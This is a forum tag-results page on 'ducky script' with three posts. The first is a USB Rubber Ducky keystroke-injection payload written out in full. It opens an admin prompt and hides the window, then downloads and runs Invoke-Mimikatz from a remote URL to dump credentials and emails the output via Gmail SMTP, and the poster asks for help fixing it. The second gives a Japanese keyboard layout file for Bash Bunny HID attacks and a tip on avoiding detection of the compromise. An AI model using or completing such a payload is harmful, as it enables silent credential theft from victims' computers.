Showing results for tags 'ducky script'.

Found 3 results

  1. I am trying to add a twist on the 15 second password stealer i robot hack in which it emails the credentials instead of uploading them to a server. This is my code. I changed the email addresses and passwords for security.

         DELAY 3000
         REM Open an admin command prompt
         GUI r
         DELAY 500
         STRING powershell Start-Process cmd -Verb runAs
         ENTER
         DELAY 2000
         ALT y
         DELAY 1000
         REM Obfuscate the command prompt
         STRING mode con:cols=18 lines=1
         ENTER
         STRING color FE
         ENTER
         REM Download and execute Invoke Mimikatz then upload the results
         STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1');$output = Invoke-Mimikatz -DumpCreds; $output > log.txt;"
         ENTER
         DELAY 1500
         STRING powershell
         ENTER
         STRING $SMTPServer = 'smtp.gmail.com'
         ENTER
         STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
         ENTER
         STRING $SMTPInfo.EnableSsl = $true
         ENTER
         STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('MyEmail1@gmail.com', 'MyPassword')
         ENTER
         STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
         ENTER
         STRING $ReportEmail.From = 'MyEmail1@gmail.com'
         ENTER
         STRING $ReportEmail.To.Add('MyEmail2@gmail.com')
         ENTER
         STRING $ReportEmail.Subject = 'PassDump'
         ENTER
         STRING $ReportEmail.Body = (Get-Content Log.txt | out-string)
         ENTER
         STRING $SMTPInfo.Send($ReportEmail)
         ENTER
         DELAY 2000
         STRING exit
         ENTER
         DELAY 500
         REM Clear the Run history and exit
         ENTER
         STRING exit
         ENTER

     And in my email inbox all I got was an email that said the words " How do I get it so it actually sends the output of Invoke-Mimikatz instead of literally sending the words Invoke-Mimikatz? Thanks in advance.
  2. So I started to work on the Bash Bunny to be able to handle non-US keyboard layout attacks for ATTACKMODE HID. To enable the SET_LANGUAGE option you need to add a [LanguageDescription].json under /root/tools/language. I used the default "us.json" as a working template. (You wanna back it up and copy it and not work off the original file.) Here is an example of a Japanese keyboard layout description file (i.e. ja.json; however, you can make it ja_win.json for specific environments):

     ---ja.json (created under /root/tools/languages/ )---

         {
         "__comment": "All numbers here are in hex format and 0x is ignored.",
         "__comment": " ",
         "__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
         "__comment": " See section 10 Keyboard/Keypad Page (0x07)",
         "__comment": " of document USB HID Usage Tables Version 1.12.",
         "__comment": " ",
         "__comment": "Definition of these 3 bytes can be found",
         "__comment": " in section B.1 Protocol 1 (Keyboard)",
         "__comment": " of document Device Class Definition for HID Version 1.11",
         "__comment": " - byte 1: Modifier keys",
         "__comment": " - byte 2: Reserved",
         "__comment": " - byte 3: Keycode 1",
         "__comment": " ",
         "__comment": "Both documents can be obtained from link here",
         "__comment": " http://www.usb.org/developers/hidpage/",
         "__comment": " ",
         "__comment": "A = LeftShift + a, { = LeftShift + [",
         "__comment": " ",
         "CTRL": "01,00,00", "CONTROL": "01,00,00",
         "SHIFT": "02,00,00",
         "ALT": "04,00,00",
         "GUI": "08,00,00", "WINDOWS": "08,00,00",
         "CTRL-ALT": "05,00,00",
         "CTRL-SHIFT": "03,00,00",
         "ALT-SHIFT": "06,00,00",
         "__comment": "Below 5 key combinations are for Mac OSX",
         "__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
         "COMMAND": "08,00,00",
         "COMMAND-CTRL": "09,00,00",
         "COMMAND-CTRL-SHIFT": "0B,00,00",
         "COMMAND-OPTION": "0C,00,00",
         "COMMAND-OPTION-SHIFT": "0E,00,00",
         "a": "00,00,04", "A": "02,00,04",
         "b": "00,00,05", "B": "02,00,05",
         "c": "00,00,06", "C": "02,00,06",
         "d": "00,00,07", "D": "02,00,07",
         "e": "00,00,08", "E": "02,00,08",
         "f": "00,00,09", "F": "02,00,09",
         "g": "00,00,0a", "G": "02,00,0a",
         "h": "00,00,0b", "H": "02,00,0b",
         "i": "00,00,0c", "I": "02,00,0c",
         "j": "00,00,0d", "J": "02,00,0d",
         "k": "00,00,0e", "K": "02,00,0e",
         "l": "00,00,0f", "L": "02,00,0f",
         "m": "00,00,10", "M": "02,00,10",
         "n": "00,00,11", "N": "02,00,11",
         "o": "00,00,12", "O": "02,00,12",
         "p": "00,00,13", "P": "02,00,13",
         "q": "00,00,14", "Q": "02,00,14",
         "r": "00,00,15", "R": "02,00,15",
         "s": "00,00,16", "S": "02,00,16",
         "t": "00,00,17", "T": "02,00,17",
         "u": "00,00,18", "U": "02,00,18",
         "v": "00,00,19", "V": "02,00,19",
         "w": "00,00,1a", "W": "02,00,1a",
         "x": "00,00,1b", "X": "02,00,1b",
         "y": "00,00,1c", "Y": "02,00,1c",
         "z": "00,00,1d", "Z": "02,00,1d",
         "1": "00,00,1e", "!": "02,00,1e",
         "2": "00,00,1f", "\"": "02,00,1f",
         "#": "02,00,20",
         "4": "00,00,21", "$": "02,00,21",
         "5": "00,00,22", "%": "02,00,22",
         "6": "00,00,23", "&": "02,00,23",
         "7": "00,00,24", "'": "02,00,24",
         "8": "00,00,25", "(": "02,00,25",
         "9": "00,00,26", ")": "02,00,26",
         "0": "00,00,27",
         "ENTER": "00,00,28",
         "ESC": "00,00,29", "ESCAPE": "00,00,29",
         "BACKSPACE": "00,00,2a",
         "TAB": "00,00,2b", "ALT-TAB": "04,00,2b",
         "SPACE": "00,00,2c", " ": "00,00,2c",
         "-": "00,00,2d", "=": "02,00,2d",
         "^": "00,00,2e", "~": "02,00,2e",
         "@": "00,00,2f", "`": "02,00,2f",
         "[": "00,00,30", "{": "02,00,30",
         "]": "00,00,32", "}": "02,00,32",
         ";": "00,00,33", "+": "02,00,33",
         ":": "00,00,34", "*": "02,00,34",
         ",": "00,00,36", "<": "02,00,36",
         ".": "00,00,37", ">": "02,00,37",
         "\/": "00,00,38", "?": "02,00,38",
         "CAPSLOCK": "00,00,39",
         "F1": "00,00,3a", "F2": "00,00,3b", "F3": "00,00,3c", "F4": "00,00,3d",
         "F5": "00,00,3e", "F6": "00,00,3f", "F7": "00,00,40", "F8": "00,00,41",
         "F9": "00,00,42", "F10": "00,00,43", "F11": "00,00,44", "F12": "00,00,45",
         "PRINTSCREEN": "00,00,46",
         "SCROLLLOCK": "00,00,47",
         "PAUSE": "00,00,48", "BREAK": "00,00,48",
         "INSERT": "00,00,49",
         "HOME": "00,00,4a",
         "PAGEUP": "00,00,4b",
         "DELETE": "00,00,4c", "DEL": "00,00,4c",
         "END": "00,00,4d",
         "PAGEDOWN": "00,00,4e",
         "RIGHTARROW": "00,00,4f", "RIGHT": "00,00,4f",
         "LEFTARROW": "00,00,50", "LEFT": "00,00,50",
         "DOWNARROW": "00,00,51", "DOWN": "00,00,51",
         "UPARROW": "00,00,52", "UP": "00,00,52",
         "NUMLOCK": "00,00,53",
         "MENU": "00,00,65", "APP": "00,00,65",
         "\\": "00,00,87", "_": "02,00,87",
         "\\": "00,00,89", "|": "02,00,89"
         }

     There are still some caveats I need to work out; somehow I can't get " ¥,| " (USB HID Keycode 87) and " ¥_ " (USB HID Keycode 89) to work, but the rest seems fine. (I suspect that this is due to the fact that these keys do not exist on a regular 101-US keyboard and there are no modifier combinations to trigger them either, which is gonna be problematic since they are used as a backslash in file paths. But I'll work some more to figure it out.)

     Workaround for Windows: For Windows you can use PowerShell to set the layout to a US keyboard by using "New-WinUserLanguageList en-US", which installs a US keyboard layout, then issue a "Set-WinUserLanguageList -LanguageList en-US" to set the default layout to a US keyboard. It's a bit slower, but if you have the time, this way is easier. You do need to reset the settings by issuing another Set-WinUserLanguageList -LanguageList [WHATEVERLANGUAGE] it was, otherwise the compromise will be detected.

     ----sample payload.txt---

         #!/bin/bash
         ATTACKMODE HID VID 0x45E PID 0x07B3
         Q SET_LANGUAGE ja
         Q DELAY 5000
         Q STRING starting with ja language option
         Q ENTER
         Q switch1/quack.txt
         Q ENTER
         Q DELAY 200
         Q ENTER STRING done
         LED R

     ---quack.txt (to test basic and special characters.)---

         STRING quacking
         DELAY 2000
         ENTER
         DELAY 750
         STRING abcdefghijklmnop
         DELAY 500
         ENTER
         STRING ABCDEFGHIJKLMNOP
         DELAY 500
         ENTER
         STRING 1234567890-^\
         DELAY 500
         ENTER
         STRING !"#$%&'()0=~|
         DELAY 500
         ENTER
         STRING @[;:],./
         DELAY 500
         ENTER
         STRING `{+*}<>?
         DELAY 500
         ENTER
  3. What is the longest ducky script created? What is the max space in kilobytes a single ducky script (in text, not compiled) would ever take up?